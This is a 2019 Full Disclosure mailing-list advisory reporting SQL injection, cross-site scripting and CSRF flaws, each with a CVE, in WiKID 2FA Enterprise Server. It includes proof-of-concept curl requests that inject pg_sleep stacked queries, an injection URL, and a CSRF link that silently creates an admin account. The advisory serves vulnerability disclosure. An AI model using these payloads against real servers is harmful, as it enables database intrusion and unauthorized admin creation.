lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAFOWCb+F-+yu7h6UFN66OZD-+PZQv0BQXqvFMM2eOsxfyLm=pw@mail.gmail.com>
Date: Wed, 16 Oct 2019 17:52:27 -0600
From: Aaron Bishop <aaron@...uritymetrics.com>
To: fulldisclosure@...lists.org
Subject: [FD] WiKID 2FA Enterprise Server Multiple Issues

WiKID Systems 2FA Enterprise Serverversion 4.2.0-b2032 and earlier was
found to be vulnerable to multiple Cross-Site Scripting, SQLi, and CSRF
issues.

*searchDevices.jsp* is vulnerable to SQL injection through the *uid* and
*domain* parameters.  The application uses Postgres which supports Stacked
Queries, the issue can be seen by submitting a request like:

SLEEP=10; HOST=$RHOST; COOKIE=$COOKIE; time curl -v -i -s -k  -X
'POST' -H "Host: $HOST" -H "Cookie: JSESSIONID=$COOKIE;" --data-binary
"uid=test&domain=1;select pg_sleep($SLEEP);--&action=Search"
https://$HOST/WiKIDAdmin/searchDevices.jsp

The request will cause the database to sleep for 10+ seconds.  This issue
has been assigned *CVE-2019-16917*.

*processPref.jsp* is vulnerable to SQL injection through the *key* parameter
if the action parameter is set to *update.*  The following request will
trigger the issue for an authenticated user:

https://$RHOST/WiKIDAdmin/processPref.jsp?action=Update&key=test%27;%20SELECT%20pg_sleep(5);--

The request will cause the database to sleep for 5+ seconds.  This issue
has been assigned *CVE-2019-17117.*

*Logs.jsp* is vulnerable to SQL injection through the *substring *and
*source* parameters.  The following request will demonstrate the issue:

time curl --output /dev/null -s -k -H "Cookie: JSESSIONID=$COOKIE"
--data-binary "source='; select pg_sleep(5);--"
https://$RHOST/WiKIDAdmin/Log.jsp

real    0m10.572s
user    0m0.008s
sys     0m0.016s

The request will cause the database to sleep for 5+ seconds.  This issue
has been assigned *CVE-2019-17119*

*usrPreregistration.jsp *is vulnerable to cross site scripting by uploading
a malicious .csv file containing <script> elements. This issue has been
assigned *CVE-2019-17114*

*Logs.jsp *is vulnerable to cross site scripting by triggering errors in
the unauthenticated portion of the application. The errors are severe
enough to appear in the logs by default.  This issue has been assigned
*CVE-2019-17115.*

*groups.jsp *is vulnerable to cross site scripting by creating a group with
a name that contains <script> elements. This issue has been assigned
*CVE-2019-17116*

*adm_usrs.jsp *is vulnerable to cross site scripting when an admin is
created with a username containing <script> elements. This issue has been
assigned *CVE-2019-17120*

The application does not implement CSRF protection.  Tricking an
authenticated user to click a link like:

<a href="https://$RHOST/WiKIDAdmin/adm_usrs.jsp?usr=pentest&newpass1=password1&newpass2=password1&action=Add">WiKIDAdmin
Manual</a>

Will result in an admin user unintentionally being created. This issue has
been assigned *CVE-2019-17118*

https://www.securitymetrics.com/blog/wikid-2fa-enterprise-server-csrf
https://www.securitymetrics.com/blog/wikid-2fa-enterprise-server-cross-site-scripting
https://www.securitymetrics.com/blog/wikid-2fa-enterprise-server-sql-injection

AARON BISHOP | Principal Penetration Tester CISSP, OSCP, OSWE P:801.995.6999
[image: SecurityMetrics]

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ